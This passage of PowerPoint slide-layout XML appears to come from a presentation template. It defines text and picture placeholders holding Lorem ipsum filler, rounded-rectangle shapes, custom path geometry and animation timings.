          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="49" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9165173" y="3713566"/>
            <a:ext cx="2410881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08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Fusce</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>diam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>tortor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>mattis</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25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591965" y="5356666"/>
            <a:ext cx="10973505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Fusce</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>diam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>tortor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>mattis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>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dapibus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> vitae, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>euismod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> non </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>purus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>. Maecenas </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> lacus </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>nec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>mauris</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>feugiat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>tristique</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> et in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>metus.is</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>congue</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>eros</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>vel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>lectus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> semper semper. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Nullam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>finibus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>nisl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> ligula </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>vestibulum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> semper ex </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>suscipit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Cras</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>fringilla</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>suscipit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>cursus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Aenean</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>accumsan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>malesuada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>hendrerit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Morbi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> sit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>amet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> dolor ante.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="26" name="Group 25"/>
          <p:cNvGrpSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="101309" y="385540"/>
            <a:ext cx="383999" cy="342172"/>
            <a:chOff x="5270500" y="1460500"/>
            <a:chExt cx="1701800" cy="2705100"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="27" name="Rounded Rectangle 26"/>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="52705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Rounded Rectangle 27"/>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="58928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Rounded Rectangle 28"/>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="65151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" name="Rounded Rectangle 2"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3099152" y="2447417"/>
            <a:ext cx="144000" cy="1727998"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 50000"/>
            </a:avLst>
          </a:pr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ounded Rectangle 29"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5977819" y="2447417"/>
            <a:ext cx="144000" cy="1727998"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 50000"/>
            </a:avLst>
          </a:pr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Rounded Rectangle 30"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8872711" y="2447417"/>
            <a:ext cx="144000" cy="1727998"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 50000"/>
            </a:avLst>
          </a:pr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3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3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3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4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4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4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3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3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3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4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4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4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500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="5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3000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="5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3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3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3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4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4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4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3500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="7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4000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="7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3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3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3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4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4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4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4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7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20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2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2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23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" grpId="0" animBg="1"/>
      <p:bldP spid="30" grpId="0" animBg="1"/>
      <p:bldP spid="31" grpId="0" animBg="1"/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ic lis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684392" y="1482278"/>
            <a:ext cx="2990141" cy="2642687"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="2242606" h="2202239">
                <a:moveTo>
                  <a:pt x="2014006" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="2140258" y="0"/>
                  <a:pt x="2242606" y="102348"/>
                  <a:pt x="2242606" y="228600"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="2242606" y="1973639"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="2242606" y="2099891"/>
                  <a:pt x="2140258" y="2202239"/>
                  <a:pt x="2014006" y="2202239"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1887754" y="2202239"/>
                  <a:pt x="1785406" y="2099891"/>
                  <a:pt x="1785406" y="1973639"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="1785406" y="228600"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="1785406" y="102348"/>
                  <a:pt x="1887754" y="0"/>
                  <a:pt x="2014006" y="0"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="1412873" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="1539125" y="0"/>
                  <a:pt x="1641473" y="102348"/>
                  <a:pt x="1641473" y="228600"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="1641473" y="1973639"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="1641473" y="2099891"/>
                  <a:pt x="1539125" y="2202239"/>
                  <a:pt x="1412873" y="2202239"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1286621" y="2202239"/>
                  <a:pt x="1184273" y="2099891"/>
                  <a:pt x="1184273" y="1973639"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="1184273" y="228600"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="1184273" y="102348"/>
                  <a:pt x="1286621" y="0"/>
                  <a:pt x="1412873" y="0"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="820206" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="946458" y="0"/>
                  <a:pt x="1048806" y="102348"/>
                  <a:pt x="1048806" y="228600"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="1048806" y="1973639"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="1048806" y="2099891"/>
                  <a:pt x="946458" y="2202239"/>
                  <a:pt x="820206" y="2202239"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="693954" y="2202239"/>
                  <a:pt x="591606" y="2099891"/>
                  <a:pt x="591606" y="1973639"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="591606" y="228600"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="591606" y="102348"/>
                  <a:pt x="693954" y="0"/>
                  <a:pt x="820206" y="0"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="228600" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="354852" y="0"/>
                  <a:pt x="457200" y="102348"/>
                  <a:pt x="457200" y="228600"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="457200" y="1973639"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="457200" y="2099891"/>
                  <a:pt x="354852" y="2202239"/>
                  <a:pt x="228600" y="2202239"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="102348" y="2202239"/>
                  <a:pt x="0" y="2099891"/>
                  <a:pt x="0" y="1973639"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="0" y="228600"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="102348"/>
                  <a:pt x="102348" y="0"/>
                  <a:pt x="228600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03251" y="324582"/>
            <a:ext cx="10972800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smtClean="0"/>
              <a:t>Text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03251" y="827103"/>
            <a:ext cx="10972800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3" name="Rounded Rectangle 2"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="603251" y="4447915"/>
            <a:ext cx="869949" cy="782954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39" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="684392" y="4493637"/>
            <a:ext cx="704141" cy="67451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 smtClean="0"/>
              <a:t>icon</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES_tradnl" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26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1608667" y="4971939"/>
            <a:ext cx="2065867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27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603256" y="5357392"/>
            <a:ext cx="3071281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30000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:defRPr sz="108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Fusce</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>diam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>tortor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>mattis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>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dapibus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> vitae, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>euismod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>purusaece</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="72" name="Rounded Rectangle 71"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4535315" y="4447915"/>
            <a:ext cx="869949" cy="782954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3" name="Text Placeholder 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="40" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4616456" y="4493637"/>
            <a:ext cx="704141" cy="67451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 smtClean="0"/>
              <a:t>icon</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES_tradnl" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="74" name="Text Placeholder 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="41" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5554133" y="4971939"/>
            <a:ext cx="2065867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75" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="42" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4548722" y="5357392"/>
            <a:ext cx="3071281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30000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:defRPr sz="108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Fusce</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>diam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>tortor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>mattis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>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dapibus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> vitae, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>euismod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>purusaece</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="76" name="Rounded Rectangle 75"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8504770" y="4447915"/>
            <a:ext cx="869949" cy="782954"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 0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7" name="Text Placeholder 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="43" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8585911" y="4493637"/>
            <a:ext cx="704141" cy="67451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 smtClean="0"/>
              <a:t>icon</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES_tradnl" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="78" name="Text Placeholder 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="44" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9510184" y="4971939"/>
            <a:ext cx="2065867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79" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="45" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8504773" y="5357392"/>
            <a:ext cx="3071281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30000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:defRPr sz="108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Fusce</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>diam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>tortor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>mattis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>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dapibus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> vitae, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>euismod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>purusaece</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/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55" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1608667" y="4452457"/>
            <a:ext cx="2065867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accent1">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40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smtClean="0"/>
              <a:t>80%</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES_tradnl" dirty="0" smtClean="0"/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56" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5554133" y="4452457"/>
            <a:ext cx="2065867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accent2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smtClean="0"/>
              <a:t>80%</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES_tradnl" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="Text Placeholder 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="57" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9510184" y="4452457"/>
            <a:ext cx="2065867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smtClean="0"/>
              <a:t>80%</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES_tradnl" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="34" name="Group 33"/>
          <p:cNvGrpSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="101309" y="385540"/>
            <a:ext cx="383999" cy="342172"/>
            <a:chOff x="5270500" y="1460500"/>
            <a:chExt cx="1701800" cy="2705100"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="35" name="Rounded Rectangle 34"/>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="52705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Rounded Rectangle 35"/>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="58928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Rounded Rectangle 36"/>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="65151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43" name="Picture Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" sz="quarter" idx="58"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4588234" y="1482278"/>
            <a:ext cx="2990141" cy="2642687"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="2242606" h="2202239">
                <a:moveTo>
                  <a:pt x="2014006" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="2140258" y="0"/>
                  <a:pt x="2242606" y="102348"/>
                  <a:pt x="2242606" y="228600"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="2242606" y="1973639"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="2242606" y="2099891"/>
                  <a:pt x="2140258" y="2202239"/>
                  <a:pt x="2014006" y="2202239"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1887754" y="2202239"/>
                  <a:pt x="1785406" y="2099891"/>
                  <a:pt x="1785406" y="1973639"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="1785406" y="228600"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="1785406" y="102348"/>
                  <a:pt x="1887754" y="0"/>
                  <a:pt x="2014006" y="0"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="1412873" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
